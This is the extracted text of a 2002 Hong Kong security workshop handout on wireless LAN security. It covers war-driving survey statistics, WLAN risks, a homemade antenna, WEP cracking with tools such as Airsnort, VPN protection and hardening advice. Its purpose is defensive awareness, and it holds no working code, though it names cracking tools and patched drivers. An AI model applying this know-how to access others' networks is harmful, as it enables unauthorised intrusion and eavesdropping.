wireless lan security live demo pisa workshop wireless lan security live demo supporting...

PISA WorkshopWireless LAN SecuritWireless LAN Securit

y Live Demoy Live Demo

Supporting Organizations

Presented by PISA members

Mr. Alan Tam Mr. Alan Tam CISSP, CCSI, ICICISSP, CCSI, ICI

Mr. Jim Shek Mr. Jim Shek CISSP, CISACISSP, CISA

Mr. Young, Wo Sang Mr. Young, Wo Sang CISSP, CISACISSP, CISA

Mr. Marco Ho Mr. Marco Ho

27 July 2002

Table of ContentTable of Content1. WLAN War Driving in Hong Kong

Jim Shek2. WLAN Terms and Security Risks

Young, Wo Sang3. Demo I: Home made antenna, so easy!

Jim Shek4. Demo II: WEP Weakness and Cracking

Alan Tam5. Demo III: Protection from Sniffing by VPN Encryption

Marco Ho6. WLAN Protection Strategy

Young, Wo Sang7. Demo IV: Protection from Illegal Access with silent SSID

Marco Ho, Alan Tam8. The Powerful WLAN Tool: Kismet

Alan Tam

Wireless LAN Security Live DemoWireless LAN Security Live Demo

War Driving in Hong Kong

Jim Shek

What is War Driving?What is War Driving?

The concept of "war driving" is simple:

You need a device capable of receiving an 802.11b signal, a device capable of moving around, and software that will log data from the second when a network is detected by the first. You then move these devices from place to place, letting them do their job. Over time, you build up a database comprised of the network name, signal strength, location, and ip/namespace in use.

War Driving in Hong KongWar Driving in Hong Kong

• Background:• Date : Jul 07, 2002• Time : 11:35am – 1:40pm• Weather: Isolated Showers


• Route : • Admiralty MTR Stations -> Pacific Place -> Tram (Admiralty to

Kennedy Town) -> Tram (Kennedy Town to Causeway Bay)


• Equipments: – Notebook + Avaya Gold Wireless LAN card +

Windows XP + NetStumbler– Notebook + Avaya Gold Wireless LAN card +

Antenna + Windows 2000 + NetStumbler

• Notes :– The Scan Speed of NetStumbler was changed to

Fastest.

• Participants :– PISA

28%

72%


• Result Overview:

• Total Number of Discovered Access Point with antenna : 187

• Total Number of Discovered Access Point without antenna : 52 (subset of above)

Chart 1: Antenna Power

WEP Enable : 23%

WEP Disable :77%


• Result WEP Usage: WEP Enable : 43 WEP Disable : 144

Chart 2: WEP Usage


• Result SSID Usage: Default SSID : 77 Use Non Default SSID : 87 Unknown: 5

Other*: 18

10 %

3 %

46 %

41 %Default SSID

Well-knownNon Default SSID

Unknown

Chart 3: SSID Usage

Other means well known SSID, ie PCCW & i-cableSome of the Default SSID list is referenced from http://wlana.net/acc_point.htm

default 27%

PCCW23%

Times_Square14%

WaveLAN Network9%

linksys6%

My Network6%

tsunami6%

HV24Ap15%

IEEE 802.11 LAN4%


• Result Top SSIDs:

Chart 4: Top SSIDs


• Result Channel Distribution:

Chart 5: Channel ID Setting Behavior

Channel : 1 2 3 4 5 6 7 8 9 10 11Number of APs : 78 1 13 4 1 18 9 2 6 14 37

29 %

71 %

Default Channel ID

Non Default Channel ID


• Interesting Observations Building-to-Building WLAN

• We discovered the signals of two APs with the same SSID name are very strong. These two APs are appeared in the list for 3 minutes while the tram is moving.


• Interesting Observations When the tram was stopped …

• When the tram was stopped, the APs are easier to discover. One of the reasons are having longer time for the software to poll within the effective range. It is particular true when we using the machine without using the antenna.


• Interesting Observations The Accessibility of APs

• Some APs were accessible when the tram was stopped. We come across some place that with the APs ready for us to connect into it. Below is the snapshot.


• 堅城中心創業商場西區警局上環 MTR 世界書局• 中銀保險環球大廈警察總站大有商場英皇中心 298


• Another Discovery in Taikoo Place Background:

• Date : Jul 05, 2002

• Time : 03:00pm – 3:20pm

• Route : Within Taikoo Place

• Equipment:

– Notebook + Avaya Gold Wireless LAN card + Antenna + Windows 2000 + NetStumbler

• Notes :

– The Scan Speed of NetStumbler was default (ie medium)

• Participants :– PISA


• Another Discovery in Taikoo Place Overview:

• Total No. of Discovered Access Point with antenna : 3030 WEP Usage:

• WEP Enable : 7 (23%) WEP Disable : 23 (77%) SSID Usage:

• Default SSID : 8 Non Default SSID : 14

• Unknown: 2 Other*: 6 (Problem SSID: 47%) Channel Distribution:

Channel : 1 3 5 6 7 8 9 11Number of APs : 17 1 2 4 1 1 1 3

(Default Channel: 80%)

Wireless LAN Terms and Wireless LAN Terms and Security RisksSecurity Risks

Young Wo Sang

What is Wireless LAN?What is Wireless LAN?

• It is a LAN• Extension of Wired LAN• Use High Frequency Radio Wave (RF)• Speed : 2Mbps to 54Mbps• Distance 100 feet to 15 miles

WLAN Terms & Basic ConceptWLAN Terms & Basic Concept

• 802.11 IEEE family of specifications for WLANs 2.4GHz 2Mbps

• 802.11a 5GHz, 54Mbps

• 802.11b Often called Wi-Fi, 2.4GHz, 11Mbps

• 802.11e QoS & Multimedia support to 802.11b & 802.11a

• 802.11g 2.4GHz, 54Mbps

• 802.11i An alternative of WEP

• 802.1x A method of authentication and security for all Ethernet-like protocols

WLAN Terms & Basic WLAN Terms & Basic ConceptConcept

• Access Point (AP) A device that serves as a communications "hub" for wireless

clients and provides a connection to a wired LAN

• Beacon Message transmitted at regular intervals by the APs Used to maintain and optimize communications to automatic

ally connect to the AP


• Ad Hoc Mode Wireless client-to-client communication, the opposite is

Infrastructure Mode


• Infrastructure Mode A client setting providing connectivity to APs As oppose to AdHoc Mode

AP


• SSID or BSSID Basic Service Set Identifier

BSSID or SSID(Basic Service Set Identifier)

beacon

beacon

beacon

BSSAn AP forms an association with one or more wireless clients is referred to as a Basic Service Set


• ESSID Extended Service Set Identifier

ESSID (Extended Service Set Identifier)

ESSIn order to increase the range and coverage of the wireless network, one needs to add more strategically placed APs to the environment to increase density. This is referred to as an Extended Service Set


• WEP optional cryptographic confidentiality algorithm


• Channel


• DSSS Channel

1 2 3 4 5 6 7 8 9 10 11

2.40

0

2.41

2

2.43

7

2.46

2

2.47

4

Frequency (GHz)

Channel 7

Channel 9

Channel 1 Channel 6 Channel 11

Channel 2

Channel 10Channel 5

Channel 4

Channel 3 Channel 8


• Channel


• DSSS Direct Sequence Spread Spectrum, a RF carrier

and pseudo-random pulse train are mixed to make

a noise like wide-band signal. • FHSS

Frequency Hopping Spread Spectrum, transmitting on one frequency for a certain time, then randomly jumping to another, and transmitting again.

Reading the StrengthenReading the Strengthen

• dBm Decibel referenced to 1 milli-watt into a 50Ω

impedance (usually) dBm = 10 * (log10mW) e.g. 0 dBm = 1 mW

• Attenuation/gain revision: dB = 10 * (log10 [output / input]) If output>input, then dB will be +ve If output<input, then dB will be -ve


• Signal Level & Noise Level

SL

NL

SL

NL

SL

NL

WLAN RiskWLAN Risk

• Unauthorized Clients

In rangeMalicious client

Out of range !!

Detector

WLAN RiskWLAN Risk

• Unauthorized or Renegade Access Points• Interception and unauthorized monitoring of w

ireless traffic • Client-to-Client Attacks• Jamming (DoS)

malicious

Jamming

Client-to-client attack

WLAN Risk - WLAN Risk - Fake Access PointFake Access Point

• Access Point Clone (Evil Twin) Traffic Interception

AP1

AP1*

WLAN Risk WLAN Risk

• Brute force attacks against access point passwords

• WEP weakness • “Mis-configurations”

SSIDs SNMP Community (RO & RW) Administration (Web, Telnet, Serial) Installation

WLAN Risk WLAN Risk

• Deployment Internal Network?! DMZ?! Who can install AP?

• Many $$ to secure the wired network• A user spend HK$2,000 to break it

When was installed? Where are APs installed?

WLAN Risk WLAN Risk

• Low cost product prevalent limited features, insecure

• Accidental detection Wireless card itself

Demo IDemo I

Home made antenna, so easyHome made antenna, so easy

Jim ShekJim Shek

Home made antenna, so easyHome made antenna, so easy

• Use available material to hand make an antenna, gain from 3dB to 11dB (Real Object Shown)

• Compared to commercial antenna with gain 6dB, costing HKD600+

• Dimension is the key to success. Measurement available on web search.

• With an antenna, the result of War Driving can be much improved so as to risk of exposure to hacking of your WLAN network!

Demo IIDemo II

WEP Weakness and CrackingWEP Weakness and Cracking

Alan TamAlan Tam

WEP WeaknessWEP Weakness

• Background

• Weakness in KSA/RC4

• Proof of Concept

• Some counter actions

The magic RFMON modeThe magic RFMON mode

• Property: Like promiscuous mode in wired Listen(Receive) only Also known as “Monitor Mode”

• Chipset capable of RFMON (i.e. have specification opened) Cisco Aironet Based on Intersil Prism2 Orinoco (well, not official)

What does Linux Hackers What does Linux Hackers use?use?

• NIC drivers wlan-ng 0.1.13+ with patch or 0.1.14pre?+ orinoco_cs 0.09b+ with patch

• Libpcap library with PF_PACKET interface patched to interpret 802.11b packets for example, 0.7.1 with patch

• Prism Driver & Orinoco Patch ftp://ftp.linux-wlan.org/pub/linux-wlan-ng/ http://airsnort.shmoo.com/orinocoinfo.html

WEPWEP• Stands for Wired Equivalent Privacy• Symmetric Encryption Algorithm: RC4• Commercial claimed key size: 40 or 128 bit

(as of April 2002)• At the back:

40 bit secret key + 24 bit IV = 64 bit packet key 104 bit secret key + 24 bit IV = 128 bit packet key

IV= Initialization Vector

Weaknesses in KSA of RC4 Weaknesses in KSA of RC4

• Presented in a paper by Scott Fluhrer, Itsik Mantin, Adi Shamir

• Invariance weakness Existence of large class of weak keys

• IV weakness Related key vulnerability

WEP AttackWEP Attack

• Invariance weakness WEP packet distinguisher

• IV weakness Exist in a commonly used mode in RC4

• Properties Cryptanalytic Attack: Generally faster than

Brute-force Attack Passive Ciphertext-only Attack: Zero knowledge

needed

Proof of ConceptProof of Concept

• Adam Stubblefield, AT&T Labs http://www.cs.rice.edu/~astubble/wep

• WEPCrack http://sourceforge.net/projects/wepcrack

• Airsnort http://airsnort.shmoo.com/

Case Study: AirsnortCase Study: Airsnort

• Maintained by The Shmoo Group

• An X-windows application

• Supported platforms: Cisco Aironet Prism Orinoco

• Requires approx. 5-10 million encrypted packets to break a key

TKIPTKIP

• Temporary Key Integrity Protocol Initially referred as WEP2 128bit TK + 40 bit Client MAC 16-octet IV RC4 (still) TK changed every 10,000 packets

ReferenceReference

• Technical Knowledge http://www.qsl.net/n9zia/wireless/index.html http://www.80211-planet.com/tutorials

• Access Points MAC addresses http://aptools.sourceforge.net/

ReferenceReference

• Linux Resources http://www.hpl.hp.com/personal/

Jean_Tourrilhes/index.html http://lists.samba.org/listinfo/wireless http://airtraf.sourceforge.net/

Demo IIIDemo III

Securing Wireless Networksby VPN

Marco Ho

Secure ProtocolsSecure Protocolsfor Encryptionfor EncryptionApplication

Transport(TCP, UDP)

Network (IP)

802.11b Link

802.1bPhysical

SSL

(VPN)

WEP

Network (IP)

802.11b Link

802.1bPhysical

WEP

Network (IP)

Ethernet Link

EthernetPhysical

Application

Transport(TCP, UDP)

Network (IP)

EthernetLink

EthernetPhysical

SSL

(VPN)

Router

Network Level Encryption Network Level Encryption (VPN)(VPN)

Advantages• Encryption of multi-protocols• Hides the network routing (with proper configuration)

Choices1. PPTP

• Come with W2K RRAS• Simpler and easier to configure

2. IPSec• More secure• Microsoft: IPSec over L2TP using 3DES• Use certificate (instead of pre-shared keys) to further improve the

security : mutual authentication

Real Life Demo with Real Life Demo with PPTPPPTP

VPN Server Microsoft VPN Server (RRAS+PPTP)

• Encryption MPPE 128 (Microsoft Point-to-point Encryption)

• Authentication MS-CHAP V2

Remark: WEP turned off for demonstration purpose

Sniffing ToolsSniffing Tools

• Two sniffing tools used to capture traffic packet contents Ethereal

• Freeware available in Linux and Win32 platforms

Iris• Commercial product, 15-day evaluation available

• Strong decode function to ease protocol session tracking

Without VPN EncryptionWithout VPN Encryption

IP-10.0.0.1

No WEP

IP-10.0.0.15

Sniffer

IP-10.0.0.20

FTP Client

IP-10.0.0.25

FTP Server

A

B

“A” FTP to “B”

Clear textClear text

Clear text

Clear text

With VPN EncryptionWith VPN Encryption

WirelessIP-10.0.0.10

VPN Gateway

EthernetIP-192.168.1.230

VPN Server (PPTP)

IP-10.0.0.1

No WEP

FTP Server

IP-192.168.1.254

IP-10.0.0.20

VPN Client

FTP Client

A

D

C

“A” FTP to “D”

with VPN

IP-10.0.0.15

Sniffer

Clear text

Wireless LAN Protection StrategiesWireless LAN Protection Strategies

Young, Wo Sang

Recommendation (I)Recommendation (I)

• Wireless LAN related Configuration Enable WEP, use 128bit key* Drop non-encrypted packets Disable SSID Broadcasts No SNMP access Choose complex admin password Enable firewall function Use MAC (hardware) address to restrict access Non-default Access Point password Change default Access Point Name Use 802.1x [warning]

EAP Enable AuthenticationEAP Enable Authentication

Recommendation (II)Recommendation (II)• Deployment Consideration

Closed Network* Treat Wireless LAN as external network VPN & Use strong encryption No DHCP (use fixed private IP) Install in a Separated Network

Recommendation (III)Recommendation (III)

• Always (wired or wireless) Install virus protection software plus automatic frequent pattern fil

e update Shared folders must impose password

• Management Issue Prohibit to install the AP without authorization Discover any new APs constantly (NetStumbler is free, Antenna is

cheap) Power off ADSL Modem when Internet access is not required Carefully select the physical location of your AP, not near window

s or front doors.

The The [warning][warning] of 802.1x of 802.1x

• Session hijacking waits for successfully authenticated , acts as AP, tells , “you are disconnected” AP thinks that is exists

• Man-in-the-middle-attack 802.1x is one way authentication mechanism acts as an AP to the acts as a user to the AP.

Reference : http://www.infoworld.com/articles/hn/xml/02/02/14/020214hnwifispec.xml

The workaround to The workaround to [warning][warning] of 802.1x of 802.1x

• Vendor Proprietary Implementation “rekeying” of WEP

• “Standard” TKIP or Temporal Key Integrity Protocol changes the encryption key about every 10,000

packets

Demo IVDemo IV

Silent WLAN Access PointSilent WLAN Access Point

Marco Ho & Alan Tam

Disabling SSID insertionDisabling SSID insertion

• Method 1: Vendor Utility It may use HTTP or SNMP to set the SSID

• Method 2: Use AP Utility run under Linux http://ap-utils.polesye.net/ Manage by SNMP Supported Platforms:

• ATMEL chipset (e.g. Linksys WAP11,D-Link DWL-900AP, PCi AP-11S)

• NWN chipset (e.g. Compex WavePort WP11)

The Powerful WLAN Tool: The Powerful WLAN Tool: KismetKismet

• http://www.kismetwireless.net/• Network sniffer• Client server architecture• Cryptographically weak packet logging• Used by German federal authorities (26 July

2002)• Platforms

Intel iPaq/ARM Zaurus/ARM

ContributorsContributorsThe workshop was jointly presented by PISA members

Alan Tam [email protected] Shek [email protected] Ho [email protected]

Young, Wo Sang [email protected]

On 27 July 2002, the eve of PISA 1st anniversary of establishment

RemarkAnother valuable presentation on the theoretical part:PISA seminar “Critical Security Issues on Wireless LAN” by Ray Hunt, 13 June 2002http://www.pisa.org.hk/event/wlan_sec.pdf

CopyrightCopyright

Professional Information Security Association (PISA) owns the copyright of the presentation. Any party can quote the whole or part of this presentation in an undistorted manner and with a clear reference to PISA.

DisclaimerDisclaimer

This is the handout of a presentation workshop. The points made here are kept concise for the purpose of presentation. If you require details of test and implementation please refer to technical references.

wireless lan security live demo pisa workshop wireless lan security live demo supporting...

Documents

hong kongequipments

hong kongroute

hong kongresultoverview

hong kongbackground

concept of war driving

hong kongresultwep usage

hong kongresultssid

hong kongjim shekwhat